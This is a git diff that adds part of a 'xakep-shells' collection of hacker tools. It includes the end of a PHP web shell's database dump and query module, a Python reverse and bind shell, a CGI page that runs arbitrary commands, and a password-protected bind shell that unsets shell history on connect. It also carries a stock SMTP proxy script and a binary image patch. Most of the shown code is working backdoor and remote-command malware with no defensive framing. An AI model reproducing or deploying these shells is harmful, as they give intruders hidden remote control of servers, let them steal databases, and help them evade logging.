+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PY/Phyton Shell.py.txt b/xakep-shells/PY/Phyton Shell.py.txt
new file mode 100644
index 0000000..10b6029
--- /dev/null
+++ b/xakep-shells/PY/Phyton Shell.py.txt	
@@ -0,0 +1,121 @@
+#!/usr/bin/env python
+
+# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
+#   d00r.py 0.3a (reverse|bind)-shell in python by fQ	#
+#							#
+#	alpha						#
+#							#
+#							#
+# usage: 						#
+# 	% ./d00r -b password port			#
+#	% ./d00r -r password port host			#
+#	% nc host port					#
+#	% nc -l -p port (please use netcat)		#
+# # # # # # # # # # # # # # # # # # # # # # # # # # # #	#
+
+
+import os, sys, socket, time
+
+
+# =================== var =======
+MAX_LEN=1024
+SHELL="/bin/zsh -c"
+TIME_OUT=300 #s
+PW=""
+PORT=""
+HOST=""
+
+
+# =================== funct =====
+# shell - exec command, return stdout, stderr; improvable
+def shell(cmd):
+	sh_out=os.popen(SHELL+" "+cmd).readlines()
+	nsh_out=""
+	for i in range(len(sh_out)):	
+		nsh_out+=sh_out[i]
+	return nsh_out	
+
+# action?
+def action(conn):
+	conn.send("\nPass?\n")
+	try: pw_in=conn.recv(len(PW))
+	except: print "timeout"
+	else:	
+		if pw_in == PW:	
+			conn.send("j00 are on air!\n")						
+			while True:               		
+				conn.send(">>> ")
+				try:
+					pcmd=conn.recv(MAX_LEN)
+				except:
+					print "timeout"
+					return True					
+				else:
+					#print "pcmd:",pcmd
+					cmd=""#pcmd
+					for i in range(len(pcmd)-1):
+						cmd+=pcmd[i]
+			                if cmd==":dc":
+						return True
+					elif cmd==":sd":
+						return False
+					else:
+						if len(cmd)>0:
+							out=shell(cmd)
+							conn.send(out)
+
+
+# =================== main ======
+argv=sys.argv
+
+if len(argv)<4: 
+	print "error; help: head -n 16 d00r.py"
+	sys.exit(1)
+elif argv[1]=="-b": 
+	PW=argv[2]
+	PORT=argv[3]
+elif argv[1]=="-r" and len(argv)>4:
+	PW=argv[2]
+	PORT=argv[3]
+	HOST=argv[4]
+else: exit(1)
+
+PORT=int(PORT)
+print "PW:",PW,"PORT:",PORT,"HOST:",HOST
+	
+#sys.argv[0]="d00r"
+
+# exit father proc
+if os.fork()!=0: 
+	sys.exit(0)
+
+# associate the socket
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(TIME_OUT)
+
+if argv[1]=="-b":
+	sock.bind(('localhost', PORT))
+	sock.listen(0)
+
+run=True
+while run:
+
+	if argv[1]=="-r":
+		try: sock.connect( (HOST, PORT) )
+		except: 
+			print "host unreachable"
+			time.sleep(5)
+		else: run=action(sock)
+	else:		
+		try:	(conn,addr)=sock.accept()
+		except: 
+			print "timeout"
+			time.sleep(1)
+		else: run=action(conn)			
+	
+	# shutdown the sokcet
+	if argv[1]=="-b": conn.shutdown(2)
+	else:
+		try: sock.send("")
+		except: time.sleep(1)
+		else: sock.shutdown(2)
\ No newline at end of file
diff --git a/xakep-shells/PY/cgi-python.py.txt b/xakep-shells/PY/cgi-python.py.txt
new file mode 100644
index 0000000..0002497
--- /dev/null
+++ b/xakep-shells/PY/cgi-python.py.txt
@@ -0,0 +1,124 @@
+#!/usr/bin/python
+# 07-07-04
+# v1.0.0
+
+# cgi-shell.py
+# A simple CGI that executes arbitrary shell commands.
+
+
+# Copyright Michael Foord
+# You are free to modify, use and relicense this code.
+
+# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
+# Use at your own risk !!!
+
+# E-mail michael AT foord DOT me DOT uk
+# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
+
+"""
+A simple CGI script to execute shell commands via CGI.
+"""
+################################################################
+# Imports
+try:
+    import cgitb; cgitb.enable()
+except:
+    pass
+import sys, cgi, os
+sys.stderr = sys.stdout
+from time import strftime
+import traceback
+from StringIO import StringIO
+from traceback import print_exc
+
+################################################################
+# constants
+
+fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
+versionstring = 'Version 1.0.0 7th July 2004'
+
+if os.environ.has_key("SCRIPT_NAME"):
+    scriptname = os.environ["SCRIPT_NAME"]
+else:
+    scriptname = ""
+
+METHOD = '"POST"'
+
+################################################################
+# Private functions and variables
+
+def getform(valuelist, theform, notpresent=''):
+    """This function, given a CGI form, extracts the data from it, based on
+    valuelist passed in. Any non-present values are set to '' - although this can be changed.
+    (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
+    data = {}
+    for field in valuelist:
+        if not theform.has_key(field):
+            data[field] = notpresent
+        else:
+            if  type(theform[field]) != type([]):
+                data[field] = theform[field].value
+            else:
+                values = map(lambda x: x.value, theform[field])     # allows for list type values
+                data[field] = values
+    return data
+
+
+theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
+<BODY><CENTER>
+<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
+<B><I>By Fuzzyman</B></I><BR>
+"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
+
+theform = """<H2>Enter Command</H2>
+<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
+<input name=cmd type=text><BR>
+<input type=submit value="Submit"><BR>
+</FORM><BR><BR>"""
+bodyend = '</BODY></HTML>'
+errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
+
+################################################################
+# main body of the script
+
+if __name__ == '__main__':
+    print "Content-type: text/html"         # this is the header to the server
+    print                                   # so is this blank line
+    form = cgi.FieldStorage()
+    data = getform(['cmd'],form)
+    thecmd = data['cmd']
+    print theformhead
+    print theform
+    if thecmd:
+        print '<HR><BR><BR>'
+        print '<B>Command : ', thecmd, '<BR><BR>'
+        print 'Result : <BR><BR>'
+        try:
+            child_stdin, child_stdout = os.popen2(thecmd)
+            child_stdin.close()
+            result = child_stdout.read()
+            child_stdout.close()
+            print result.replace('\n', '<BR>')
+
+        except Exception, e:                      # an error in executing the command
+            print errormess
+            f = StringIO()
+            print_exc(file=f)
+            a = f.getvalue().splitlines()
+            for line in a:
+                print line
+
+    print bodyend
+
+
+"""
+TODO/ISSUES
+
+
+
+CHANGELOG
+
+07-07-04        Version 1.0.0
+A very basic system for executing shell commands.
+I may expand it into a proper 'environment' with session persistence...
+"""
diff --git a/xakep-shells/PY/smtpd.py.txt b/xakep-shells/PY/smtpd.py.txt
new file mode 100644
index 0000000..7acf12b
--- /dev/null
+++ b/xakep-shells/PY/smtpd.py.txt
@@ -0,0 +1,549 @@
+#!/usr/local/bin/python
+"""An RFC 2821 smtp proxy.
+
+Usage: %(program)s [options] [localhost:localport [remotehost:remoteport]]
+
+Options:
+
+    --nosetuid
+    -n
+        This program generally tries to setuid `nobody', unless this flag is
+        set.  The setuid call will fail if this program is not run as root (in
+        which case, use this flag).
+
+    --version
+    -V
+        Print the version number and exit.
+
+    --class classname
+    -c classname
+        Use `classname' as the concrete SMTP proxy class.  Uses `PureProxy' by
+        default.
+
+    --debug
+    -d
+        Turn on debugging prints.
+
+    --help
+    -h
+        Print this message and exit.
+
+Version: %(__version__)s
+
+If localhost is not given then `localhost' is used, and if localport is not
+given then 8025 is used.  If remotehost is not given then `localhost' is used,
+and if remoteport is not given, then 25 is used.
+"""
+
+
+# Overview:
+#
+# This file implements the minimal SMTP protocol as defined in RFC 821.  It
+# has a hierarchy of classes which implement the backend functionality for the
+# smtpd.  A number of classes are provided:
+#
+#   SMTPServer - the base class for the backend.  Raises NotImplementedError
+#   if you try to use it.
+#
+#   DebuggingServer - simply prints each message it receives on stdout.
+#
+#   PureProxy - Proxies all messages to a real smtpd which does final
+#   delivery.  One known problem with this class is that it doesn't handle
+#   SMTP errors from the backend server at all.  This should be fixed
+#   (contributions are welcome!).
+#
+#   MailmanProxy - An experimental hack to work with GNU Mailman
+#   <www.list.org>.  Using this server as your real incoming smtpd, your
+#   mailhost will automatically recognize and accept mail destined to Mailman
+#   lists when those lists are created.  Every message not destined for a list
+#   gets forwarded to a real backend smtpd, as with PureProxy.  Again, errors
+#   are not handled correctly yet.
+#
+# Please note that this script requires Python 2.0
+#
+# Author: Barry Warsaw <barry@python.org>
+#
+# TODO:
+#
+# - support mailbox delivery
+# - alias files
+# - ESMTP
+# - handle error codes from the backend smtpd
+
+import sys
+import os
+import errno
+import getopt
+import time
+import socket
+import asyncore
+import asynchat
+
+__all__ = ["SMTPServer","DebuggingServer","PureProxy","MailmanProxy"]
+
+program = sys.argv[0]
+__version__ = 'Python SMTP proxy version 0.2'
+
+
+class Devnull:
+    def write(self, msg): pass
+    def flush(self): pass
+
+
+DEBUGSTREAM = Devnull()
+NEWLINE = '\n'
+EMPTYSTRING = ''
+COMMASPACE = ', '
+
+
+
+def usage(code, msg=''):
+    print >> sys.stderr, __doc__ % globals()
+    if msg:
+        print >> sys.stderr, msg
+    sys.exit(code)
+
+
+
+class SMTPChannel(asynchat.async_chat):
+    COMMAND = 0
+    DATA = 1
+
+    def __init__(self, server, conn, addr):
+        asynchat.async_chat.__init__(self, conn)
+        self.__server = server
+        self.__conn = conn
+        self.__addr = addr
+        self.__line = []
+        self.__state = self.COMMAND
+        self.__greeting = 0
+        self.__mailfrom = None
+        self.__rcpttos = []
+        self.__data = ''
+        self.__fqdn = socket.getfqdn()
+        self.__peer = conn.getpeername()
+        print >> DEBUGSTREAM, 'Peer:', repr(self.__peer)
+        self.push('220 %s %s' % (self.__fqdn, __version__))
+        self.set_terminator('\r\n')
+
+    # Overrides base class for convenience
+    def push(self, msg):
+        asynchat.async_chat.push(self, msg + '\r\n')
+
+    # Implementation of base class abstract method
+    def collect_incoming_data(self, data):
+        self.__line.append(data)
+
+    # Implementation of base class abstract method
+    def found_terminator(self):
+        line = EMPTYSTRING.join(self.__line)
+        print >> DEBUGSTREAM, 'Data:', repr(line)
+        self.__line = []
+        if self.__state == self.COMMAND:
+            if not line:
+                self.push('500 Error: bad syntax')
+                return
+            method = None
+            i = line.find(' ')
+            if i < 0:
+                command = line.upper()
+                arg = None
+            else:
+                command = line[:i].upper()
+                arg = line[i+1:].strip()
+            method = getattr(self, 'smtp_' + command, None)
+            if not method:
+                self.push('502 Error: command "%s" not implemented' % command)
+                return
+            method(arg)
+            return
+        else:
+            if self.__state != self.DATA:
+                self.push('451 Internal confusion')
+                return
+            # Remove extraneous carriage returns and de-transparency according
+            # to RFC 821, Section 4.5.2.
+            data = []
+            for text in line.split('\r\n'):
+                if text and text[0] == '.':
+                    data.append(text[1:])
+                else:
+                    data.append(text)
+            self.__data = NEWLINE.join(data)
+            status = self.__server.process_message(self.__peer,
+                                                   self.__mailfrom,
+                                                   self.__rcpttos,
+                                                   self.__data)
+            self.__rcpttos = []
+            self.__mailfrom = None
+            self.__state = self.COMMAND
+            self.set_terminator('\r\n')
+            if not status:
+                self.push('250 Ok')
+            else:
+                self.push(status)
+
+    # SMTP and ESMTP commands
+    def smtp_HELO(self, arg):
+        if not arg:
+            self.push('501 Syntax: HELO hostname')
+            return
+        if self.__greeting:
+            self.push('503 Duplicate HELO/EHLO')
+        else:
+            self.__greeting = arg
+            self.push('250 %s' % self.__fqdn)
+
+    def smtp_NOOP(self, arg):
+        if arg:
+            self.push('501 Syntax: NOOP')
+        else:
+            self.push('250 Ok')
+
+    def smtp_QUIT(self, arg):
+        # args is ignored
+        self.push('221 Bye')
+        self.close_when_done()
+
+    # factored
+    def __getaddr(self, keyword, arg):
+        address = None
+        keylen = len(keyword)
+        if arg[:keylen].upper() == keyword:
+            address = arg[keylen:].strip()
+            if not address:
+                pass
+            elif address[0] == '<' and address[-1] == '>' and address != '<>':
+                # Addresses can be in the form <person@dom.com> but watch out
+                # for null address, e.g. <>
+                address = address[1:-1]
+        return address
+
+    def smtp_MAIL(self, arg):
+        print >> DEBUGSTREAM, '===> MAIL', arg
+        address = self.__getaddr('FROM:', arg)
+        if not address:
+            self.push('501 Syntax: MAIL FROM:<address>')
+            return
+        if self.__mailfrom:
+            self.push('503 Error: nested MAIL command')
+            return
+        self.__mailfrom = address
+        print >> DEBUGSTREAM, 'sender:', self.__mailfrom
+        self.push('250 Ok')
+
+    def smtp_RCPT(self, arg):
+        print >> DEBUGSTREAM, '===> RCPT', arg
+        if not self.__mailfrom:
+            self.push('503 Error: need MAIL command')
+            return
+        address = self.__getaddr('TO:', arg)
+        if not address:
+            self.push('501 Syntax: RCPT TO: <address>')
+            return
+        self.__rcpttos.append(address)
+        print >> DEBUGSTREAM, 'recips:', self.__rcpttos
+        self.push('250 Ok')
+
+    def smtp_RSET(self, arg):
+        if arg:
+            self.push('501 Syntax: RSET')
+            return
+        # Resets the sender, recipients, and data, but not the greeting
+        self.__mailfrom = None
+        self.__rcpttos = []
+        self.__data = ''
+        self.__state = self.COMMAND
+        self.push('250 Ok')
+
+    def smtp_DATA(self, arg):
+        if not self.__rcpttos:
+            self.push('503 Error: need RCPT command')
+            return
+        if arg:
+            self.push('501 Syntax: DATA')
+            return
+        self.__state = self.DATA
+        self.set_terminator('\r\n.\r\n')
+        self.push('354 End data with <CR><LF>.<CR><LF>')
+
+
+
+class SMTPServer(asyncore.dispatcher):
+    def __init__(self, localaddr, remoteaddr):
+        self._localaddr = localaddr
+        self._remoteaddr = remoteaddr
+        asyncore.dispatcher.__init__(self)
+        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
+        # try to re-use a server port if possible
+        self.set_reuse_addr()
+        self.bind(localaddr)
+        self.listen(5)
+        print >> DEBUGSTREAM, \
+              '%s started at %s\n\tLocal addr: %s\n\tRemote addr:%s' % (
+            self.__class__.__name__, time.ctime(time.time()),
+            localaddr, remoteaddr)
+
+    def handle_accept(self):
+        conn, addr = self.accept()
+        print >> DEBUGSTREAM, 'Incoming connection from %s' % repr(addr)
+        channel = SMTPChannel(self, conn, addr)
+
+    # API for "doing something useful with the message"
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        """Override this abstract method to handle messages from the client.
+
+        peer is a tuple containing (ipaddr, port) of the client that made the
+        socket connection to our smtp port.
+
+        mailfrom is the raw address the client claims the message is coming
+        from.
+
+        rcpttos is a list of raw addresses the client wishes to deliver the
+        message to.
+
+        data is a string containing the entire full text of the message,
+        headers (if supplied) and all.  It has been `de-transparencied'
+        according to RFC 821, Section 4.5.2.  In other words, a line
+        containing a `.' followed by other text has had the leading dot
+        removed.
+
+        This function should return None, for a normal `250 Ok' response;
+        otherwise it returns the desired response string in RFC 821 format.
+
+        """
+        raise NotImplementedError
+
+
+
+class DebuggingServer(SMTPServer):
+    # Do something with the gathered message
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        inheaders = 1
+        lines = data.split('\n')
+        print '---------- MESSAGE FOLLOWS ----------'
+        for line in lines:
+            # headers first
+            if inheaders and not line:
+                print 'X-Peer:', peer[0]
+                inheaders = 0
+            print line
+        print '------------ END MESSAGE ------------'
+
+
+
+class PureProxy(SMTPServer):
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        lines = data.split('\n')
+        # Look for the last header
+        i = 0
+        for line in lines:
+            if not line:
+                break
+            i += 1
+        lines.insert(i, 'X-Peer: %s' % peer[0])
+        data = NEWLINE.join(lines)
+        refused = self._deliver(mailfrom, rcpttos, data)
+        # TBD: what to do with refused addresses?
+        print >> DEBUGSTREAM, 'we got some refusals:', refused
+
+    def _deliver(self, mailfrom, rcpttos, data):
+        import smtplib
+        refused = {}
+        try:
+            s = smtplib.SMTP()
+            s.connect(self._remoteaddr[0], self._remoteaddr[1])
+            try:
+                refused = s.sendmail(mailfrom, rcpttos, data)
+            finally:
+                s.quit()
+        except smtplib.SMTPRecipientsRefused, e:
+            print >> DEBUGSTREAM, 'got SMTPRecipientsRefused'
+            refused = e.recipients
+        except (socket.error, smtplib.SMTPException), e:
+            print >> DEBUGSTREAM, 'got', e.__class__
+            # All recipients were refused.  If the exception had an associated
+            # error code, use it.  Otherwise,fake it with a non-triggering
+            # exception code.
+            errcode = getattr(e, 'smtp_code', -1)
+            errmsg = getattr(e, 'smtp_error', 'ignore')
+            for r in rcpttos:
+                refused[r] = (errcode, errmsg)
+        return refused
+
+
+
+class MailmanProxy(PureProxy):
+    def process_message(self, peer, mailfrom, rcpttos, data):
+        from cStringIO import StringIO
+        from Mailman import Utils
+        from Mailman import Message
+        from Mailman import MailList
+        # If the message is to a Mailman mailing list, then we'll invoke the
+        # Mailman script directly, without going through the real smtpd.
+        # Otherwise we'll forward it to the local proxy for disposition.
+        listnames = []
+        for rcpt in rcpttos:
+            local = rcpt.lower().split('@')[0]
+            # We allow the following variations on the theme
+            #   listname
+            #   listname-admin
+            #   listname-owner
+            #   listname-request
+            #   listname-join
+            #   listname-leave
+            parts = local.split('-')
+            if len(parts) > 2:
+                continue
+            listname = parts[0]
+            if len(parts) == 2:
+                command = parts[1]
+            else:
+                command = ''
+            if not Utils.list_exists(listname) or command not in (
+                    '', 'admin', 'owner', 'request', 'join', 'leave'):
+                continue
+            listnames.append((rcpt, listname, command))
+        # Remove all list recipients from rcpttos and forward what we're not
+        # going to take care of ourselves.  Linear removal should be fine
+        # since we don't expect a large number of recipients.
+        for rcpt, listname, command in listnames:
+            rcpttos.remove(rcpt)
+        # If there's any non-list destined recipients left,
+        print >> DEBUGSTREAM, 'forwarding recips:', ' '.join(rcpttos)
+        if rcpttos:
+            refused = self._deliver(mailfrom, rcpttos, data)
+            # TBD: what to do with refused addresses?
+            print >> DEBUGSTREAM, 'we got refusals:', refused
+        # Now deliver directly to the list commands
+        mlists = {}
+        s = StringIO(data)
+        msg = Message.Message(s)
+        # These headers are required for the proper execution of Mailman.  All
+        # MTAs in existance seem to add these if the original message doesn't
+        # have them.
+        if not msg.getheader('from'):
+            msg['From'] = mailfrom
+        if not msg.getheader('date'):
+            msg['Date'] = time.ctime(time.time())
+        for rcpt, listname, command in listnames:
+            print >> DEBUGSTREAM, 'sending message to', rcpt
+            mlist = mlists.get(listname)
+            if not mlist:
+                mlist = MailList.MailList(listname, lock=0)
+                mlists[listname] = mlist
+            # dispatch on the type of command
+            if command == '':
+                # post
+                msg.Enqueue(mlist, tolist=1)
+            elif command == 'admin':
+                msg.Enqueue(mlist, toadmin=1)
+            elif command == 'owner':
+                msg.Enqueue(mlist, toowner=1)
+            elif command == 'request':
+                msg.Enqueue(mlist, torequest=1)
+            elif command in ('join', 'leave'):
+                # TBD: this is a hack!
+                if command == 'join':
+                    msg['Subject'] = 'subscribe'
+                else:
+                    msg['Subject'] = 'unsubscribe'
+                msg.Enqueue(mlist, torequest=1)
+
+
+
+class Options:
+    setuid = 1
+    classname = 'PureProxy'
+
+
+
+def parseargs():
+    global DEBUGSTREAM
+    try:
+        opts, args = getopt.getopt(
+            sys.argv[1:], 'nVhc:d',
+            ['class=', 'nosetuid', 'version', 'help', 'debug'])
+    except getopt.error, e:
+        usage(1, e)
+
+    options = Options()
+    for opt, arg in opts:
+        if opt in ('-h', '--help'):
+            usage(0)
+        elif opt in ('-V', '--version'):
+            print >> sys.stderr, __version__
+            sys.exit(0)
+        elif opt in ('-n', '--nosetuid'):
+            options.setuid = 0
+        elif opt in ('-c', '--class'):
+            options.classname = arg
+        elif opt in ('-d', '--debug'):
+            DEBUGSTREAM = sys.stderr
+
+    # parse the rest of the arguments
+    if len(args) < 1:
+        localspec = 'localhost:8025'
+        remotespec = 'localhost:25'
+    elif len(args) < 2:
+        localspec = args[0]
+        remotespec = 'localhost:25'
+    elif len(args) < 3:
+        localspec = args[0]
+        remotespec = args[1]
+    else:
+        usage(1, 'Invalid arguments: %s' % COMMASPACE.join(args))
+
+    # split into host/port pairs
+    i = localspec.find(':')
+    if i < 0:
+        usage(1, 'Bad local spec: %s' % localspec)
+    options.localhost = localspec[:i]
+    try:
+        options.localport = int(localspec[i+1:])
+    except ValueError:
+        usage(1, 'Bad local port: %s' % localspec)
+    i = remotespec.find(':')
+    if i < 0:
+        usage(1, 'Bad remote spec: %s' % remotespec)
+    options.remotehost = remotespec[:i]
+    try:
+        options.remoteport = int(remotespec[i+1:])
+    except ValueError:
+        usage(1, 'Bad remote port: %s' % remotespec)
+    return options
+
+
+
+if __name__ == '__main__':
+    options = parseargs()
+    # Become nobody
+    if options.setuid:
+        try:
+            import pwd
+        except ImportError:
+            print >> sys.stderr, \
+                  'Cannot import module "pwd"; try running with -n option.'
+            sys.exit(1)
+        nobody = pwd.getpwnam('nobody')[2]
+        try:
+            os.setuid(nobody)
+        except OSError, e:
+            if e.errno != errno.EPERM: raise
+            print >> sys.stderr, \
+                  'Cannot setuid "nobody"; try running with -n option.'
+            sys.exit(1)
+    classname = options.classname
+    if "." in classname:
+        lastdot = classname.rfind(".")
+        mod = __import__(classname[:lastdot], globals(), locals(), [""])
+        classname = classname[lastdot+1:]
+    else:
+        import __main__ as mod
+    class_ = getattr(mod, classname)
+    proxy = class_((options.localhost, options.localport),
+                   (options.remotehost, options.remoteport))
+    try:
+        asyncore.loop()
+    except KeyboardInterrupt:
+        pass 
diff --git a/xakep-shells/PY/wh_bindshell.py.txt b/xakep-shells/PY/wh_bindshell.py.txt
new file mode 100644
index 0000000..5a05e32
--- /dev/null
+++ b/xakep-shells/PY/wh_bindshell.py.txt
@@ -0,0 +1,86 @@
+#!/usr/bin/env python
+#####################
+#Coded by ~S/E/r/G~
+#mailto:serg[dot]web-hack.ru
+#version 1.2.1
+#
+#Use: python wh_bindshell.py [port] [password] | python wh_bindshell.py - for use
+#                                               default_settings
+#for make password:
+#   python -c"import md5;x=md5.new('you_password');print x.hexdigest()"
+#
+#bugz: ctrl+c etc =script stoped=\ (after reconnect it work)
+
+from socket import *
+import os
+import sys
+import md5
+import popen2
+
+#############_Default_#####################
+Port=50001                                #_default port
+Pass ='ac0b72df8bd2939ca4d1466d11c9846b'  #_default password ='web-hack'
+simvol='$ '                               #_prompt
+autocommands="unset HISTFILE;uname -a;id" #autostart=)
+kill_bsh='kbsh'                           #command for kill bindshell
+##########################################
+if len(sys.argv)>1:
+    Port=int(sys.argv[1])
+    print '[+]Port=',sys.argv[1]
+    if len(sys.argv)>2:
+        Pass=str(md5.new(sys.argv[2]).hexdigest())
+	print '[+]New_pass'
+
+try:
+    sockobj=socket(AF_INET,SOCK_STREAM)
+    sockobj.bind(('',Port))
+    sockobj.listen(5)
+except:
+    print '[-]SocketError',sys.exc_value
+    sys.exit(1)
+
+if os.fork()==0: #for start bindshell as proc and exit
+    while 1:
+        connection,address=sockobj.accept()
+        data=connection.recv(1024)
+        getpass=md5.new(data[:-2])
+        bsh_pid=os.getpid()
+        if getpass.hexdigest()==Pass:
+            if os.fork()==0:    
+                info=os.popen(autocommands).read()
+                connection.send(info)
+                while 1:
+                    data=connection.recv(1024)
+                    if not data:break
+                    if data[:-2]==kill_bsh:
+                        os.popen('kill '+str(bsh_pid))
+                        sys.exit(0)
+                    cmd_res,stdin,stderror=popen2.popen3(data[:-2])
+                    result= cmd_res.read()
+                    error=stderror.read()
+                    if error:
+                        connection.send(error)       
+                       
+                    for i in range(len(data.split())-1):
+                        if 'cd' in data.split()[i]:
+                            try:                            
+                                os.chdir(data.split()[i+1].split(';')[0])
+                            except:
+                                error='[-]Error '+str(sys.exc_value)+'\n'
+                                connection.send(error)
+    ###Prompt
+                    username=os.popen("whoami").read()
+                    adr=os.popen("uname -n").read()
+                    if username[:-1]=='root':
+                            simvol='# '
+                    path=os.getcwd()
+                    promt='['+username[:-1]+'@'+adr[:-1]+' '+path+']'+simvol
+    ###                  
+                    answer=result+promt
+                    connection.send(answer)
+        else:
+               connection.close()             
+sys.exit(0)
+        
+	    
+	    
diff --git a/xakep-shells/README.md b/xakep-shells/README.md
new file mode 100644
index 0000000..bf2c952
--- /dev/null
+++ b/xakep-shells/README.md
@@ -0,0 +1 @@
+from http://files.xakep.biz/shells/
diff --git a/xakep-shells/others/mod_joomla_shell.PNG b/xakep-shells/others/mod_joomla_shell.PNG
new file mode 100644
index 0000000000000000000000000000000000000000..21b0f5989f3274e92a296d25d14d3ed4db0f5f6c
GIT binary patch
literal 7021
zcmY*ec|26_+a61lB?%Qmj6ErgZOYik7LzrSiZCH2`!)ulkbU1Wk$vBHAv@XkUG_D@
zjEpgO=llJ=zt8)5|2gM8_qoq~opV0Vb3NC6-yzR*)aYs0XaE2Jy@tAq9soclNxE*j
zN=`Z^RF|BPPGrt{YD$2T!Mod}0VP~fTM+;#kEA7<Um=a}y;axK1^~SH0RX>10DwR;
